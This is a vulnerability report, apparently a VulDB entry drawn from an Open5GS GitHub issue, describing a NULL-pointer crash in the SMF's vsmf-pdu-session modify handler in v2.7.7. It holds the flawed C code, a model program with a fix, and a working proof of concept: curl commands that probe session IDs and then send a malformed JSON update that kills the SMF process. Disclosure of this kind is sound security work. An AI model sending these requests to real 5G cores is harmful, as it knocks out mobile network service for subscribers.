| Field | Value |
|---|---|
| Title | Open5GS SMF v2.7.7 Denial of Service |

Description:

### Open5GS Release, Revision, or Tag
v2.7.7
### Description
SMF crashes when a `VsmfUpdateData` request to
`POST /nsmf-pdusession/v1/vsmf-pdu-session/{smContextRef}/modify` contains a
`qosFlowsAddModRequestList[*]` item with `qfi` and `qosFlowDescription` but no
`qosFlowProfile`.
`smf_nsmf_handle_update_data_in_vsmf()` accepts such an item through the first
check and then immediately dereferences the missing `qosFlowProfile` while
formatting the validation error log:
```c
src = node->data;
/* First check: an item is accepted if it has a qfi and EITHER a
   qosFlowDescription OR a qosFlowProfile, so a description-only item
   passes with qos_flow_profile == NULL. */
if (!src ||
    !src->qfi ||
    !(src->qos_flow_description || src->qos_flow_profile)) {
    ...
}
qosFlowProfile = src->qos_flow_profile;
/* Second check: qosFlowProfile may be NULL here, but the error log
   dereferences it (qosFlowProfile->_5qi) before the item is rejected. */
if (!qosFlowProfile || ...) {
    ogs_error("[%s:%d] Invalid qosFlowProfile [%d:%p:%d]",
            smf_ue->supi, sess->psi,
            qosFlowProfile->_5qi,
            qosFlowProfile->arp,
            qosFlowProfile->arp ?
                qosFlowProfile->arp->priority_level : 0);
```
That null dereference aborts the SMF process before it can return a normal
error response.
This issue is not a duplicate of the existing `sm-policy-notify` callback
reports. It affects a different SBI route and a different HR-related business
handler.
As a control, supplying a valid `qosFlowProfile` caused execution to progress
further into the same handler and later abort on a different assertion
(`param.n2smbuf`), showing that the missing-profile case crashes earlier.
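The following stand-alone C program is an added example and is not Open5GS code or code from the report; it models the two checks quoted above so the failure mode can be exercised without a 5G core. The struct names, the two `validate_item_*` functions, the status codes, `repro_item()` and the `arp` presence test that stands in for the elided `...` condition are all assumptions made for the example; the real handler operates on OpenAPI-generated types. `validate_item_vulnerable()` keeps the reported ordering (format the log, then reject) and therefore dereferences NULL for a description-only item; `validate_item_fixed()` shows the hardened form, which refuses to touch the pointer the branch has just found to be NULL and logs only fields that are known to be valid.

```c
/* Added example, not Open5GS code. Models the validation reported in
 * smf_nsmf_handle_update_data_in_vsmf(); all names below are assumptions. */
#include <stdio.h>
#include <string.h>

/* Assumed shapes: only the fields the reported snippet touches. */
typedef struct { int priority_level; } arp_t;
typedef struct { int _5qi; arp_t *arp; } qos_flow_profile_t;
typedef struct {
    int qfi;
    const char *qos_flow_description;
    qos_flow_profile_t *qos_flow_profile;
} qos_flow_item_t;

enum { VALIDATE_OK = 0, VALIDATE_BAD_ITEM = 1, VALIDATE_BAD_PROFILE = 2 };

/* Reported ordering: the first check lets a description-only item through
 * with a NULL profile, and the second check formats the error message by
 * dereferencing that NULL profile before returning the rejection.
 * Calling this with repro_item() crashes, as the SMF does. */
int validate_item_vulnerable(const qos_flow_item_t *src, char *log, size_t n)
{
    if (!src || !src->qfi ||
        !(src->qos_flow_description || src->qos_flow_profile))
        return VALIDATE_BAD_ITEM;

    const qos_flow_profile_t *p = src->qos_flow_profile;
    if (!p || !p->arp) {                 /* "!p->arp" stands in for "..." */
        snprintf(log, n, "Invalid qosFlowProfile [%d:%p:%d]",
                 p->_5qi,                /* NULL dereference when p == NULL */
                 (void *)p->arp,
                 p->arp ? p->arp->priority_level : 0);
        return VALIDATE_BAD_PROFILE;
    }
    return VALIDATE_OK;
}

/* Hardened form: a missing profile is reported using fields that are known
 * to be present (the qfi), and the profile is dereferenced only after the
 * NULL case has been handled. The caller maps BAD_* to a 400 response. */
int validate_item_fixed(const qos_flow_item_t *src, char *log, size_t n)
{
    if (!src || !src->qfi ||
        !(src->qos_flow_description || src->qos_flow_profile))
        return VALIDATE_BAD_ITEM;

    const qos_flow_profile_t *p = src->qos_flow_profile;
    if (!p) {
        snprintf(log, n, "Missing qosFlowProfile for qfi %d", src->qfi);
        return VALIDATE_BAD_PROFILE;
    }
    if (!p->arp) {
        snprintf(log, n, "Invalid qosFlowProfile [%d:%p] for qfi %d",
                 p->_5qi, (void *)p->arp, src->qfi);
        return VALIDATE_BAD_PROFILE;
    }
    return VALIDATE_OK;
}

/* Constructed to match the JSON item sent in step 3 of the report:
 * qfi and qosFlowDescription present, qosFlowProfile absent. */
qos_flow_item_t repro_item(void)
{
    qos_flow_item_t it = { 1, "permit out ip from 10.0.0.1 1000 to any", NULL };
    return it;
}

int main(void)
{
    char log[128] = "";
    qos_flow_item_t item = repro_item();
    int rc = validate_item_fixed(&item, log, sizeof log);
    printf("fixed handler: rc=%d log=\"%s\"\n", rc, log);
    /* validate_item_vulnerable(&item, log, sizeof log) would segfault here. */
    return rc == VALIDATE_BAD_PROFILE ? 0 : 1;
}
```

The fix is deliberately two-part: either the first check must require `qosFlowProfile` when the handler cannot proceed without it, or, as here, the second check must log without dereferencing the pointer it is rejecting. Both are needed if the first check is left as an OR.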
### Steps to reproduce
1. Start the Open5GS Docker lab and establish a real SMF session using the
existing UERANSIM containers:
```bash
docker restart smf-audit-ue
docker logs --tail 30 smf-audit-ue
```
Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
2. Identify the active `smContextRef`. In this run it was `1`:
```bash
# Probe candidate smContextRef values on a known SMF callback route and
# print the HTTP status returned for each id.
for id in 1 2 3 4 5 6; do
  code=$(curl --http2-prior-knowledge -m 3 -s -o /tmp/out.$$ -w '%{http_code}' \
    -X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/${id}/update \
    -H 'content-type: application/json' \
    --data '{"smPolicyDecision":{}}')
  printf '%s %s\n' "$id" "$code"
done
rm -f "/tmp/out.$$"
```
3. Send the forged update with `qosFlowProfile` omitted:
```bash
payload=$(python3 - <<'PY'
import json
body = {
"requestIndication": "NW_REQ_PDU_SES_MOD",
"qosFlowsAddModRequestList": [
{
"qfi": 1,
"qosFlowDescription": "permit out ip from 10.0.0.1 1000 to any"
}
]
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.10/nsmf-pdusession/v1/vsmf-pdu-session/1/modify \
-H 'content-type: application/json' \
--data "$payload"
```
4. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T21:01:35Z smf
```
### Logs
```text
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T21:01:42.284384125Z
No application log was emitted for this malformed request before process exit.
```
### Expected behaviour
SMF should reject the malformed `VsmfUpdateData` item with a normal `400` error response.
### Observed behaviour
The HTTP/2 stream aborts and the SMF process exits with code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required.

| Field | Value |
|---|---|
| Source | https://github.com/open5gs/open5gs/issues/4453 |
| User | FrankLin (UID 97501) |
| Submission | 20/04/2026 21:23 (1 month ago) |
| Moderation | 11/05/2026 10:02 (21 days later) |
| Status | Accepted |
| VulDB entry | 362586 [Open5GS up to 2.7.7 SMF /src/smf/nsmf-handler.c smf_nsmf_handle_update_data_in_vsmf qosFlowProfile Denial of Service] |
| Points | 20 |